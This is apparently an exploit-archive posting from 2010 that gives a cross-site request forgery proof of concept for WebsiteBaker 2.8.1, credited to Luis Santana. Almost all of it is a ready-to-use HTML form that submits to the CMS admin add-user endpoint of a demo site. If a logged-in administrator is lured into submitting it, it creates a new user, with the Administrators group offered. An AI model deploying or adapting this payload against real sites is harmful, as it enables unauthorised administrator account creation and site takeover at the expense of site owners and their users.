WebsiteBaker 2.8.1 CSRF Vulnerability
Posted on 19 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>WebsiteBaker 2.8.1 CSRF Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================== WebsiteBaker 2.8.1 CSRF Vulnerability ===================================== # Author: Luis Santana # Software Link: http://www.websitebaker2.org/modules/download_gallery/dlc.php?file=88&id=1269641667 # Version: 2.8.1 # Tested on: All Regards, Luis Santana Admin - http://hacktalk.net HackTalk Security <h1>WebsiteBaker 2.8.1 CSRF Proof of Concept By Luis Santana HackTalk Security</h1> <form name="user"action="http://demo.opensourcecms.com/websitebaker/admin/users/add.php" method="post" class=""> <input type="hidden" name="user_id" value="" /> <input type="hidden" name="username_fieldname" value="username_08y7h65u" /> <table cellpadding="5" cellspacing="0" border="0" width="100%"> <tr> <td width="150">Username:</td> <td class="value_input"> <input type="text" name="username_08y7h65u" maxlength="30" value="" /> </td> </tr> <tr> <td>Password:</td> <td class="value_input"> <input type="password" name="password" maxlength="30" /> </td> </tr> <tr> <td>Re-type Password:</td> <td class="value_input"> <input type="password" name="password2" maxlength="30" /> </td> </tr> <tr style="display:none;"> <td> </td> <td style="font-size: 10px;"> Please note: You should only enter values in the above fields if you wish to change this users password </td> </tr> <tr> <td>Display Name:</td> <td class="value_input"> <input type="text" name="display_name" maxlength="255" value="" /> </td> </tr> <tr> <td>Email:</td> <td class="value_input"> <input type="text" name="email" maxlength="255" value="" /> </td> </tr> <tr style=""> <td>Home Folder:</td> <td class="value_input"> <select name="home_folder"> <option value="">None</option> <option value="/testbild" >/media/testbild</option> </select> </td> </tr> <tr> <td>Group:</td> <td class="value_input"> <select name="groups[]" multiple="multiple" size="5"> <option value="1" >Administrators</option> </select> </td> </tr> <tr> <td> </td> <td> <input type="radio" name="active[]" id="active" value="1" checked="checked" /> <label for="active">Active</label> <input type="radio" name="active[]" id="disabled" value="0" /> <label for="disabled">Disabled</label> </td> </tr> <tr> <td> </td> <td> <input type="submit" name="submit" value="Add" /> <input type="reset" name="reset" value="Reset" /> </td> </tr> </table> </form> <p>Greetz to Shardy, Xires and Stacy, Rage, and n3xus</p> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-19]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
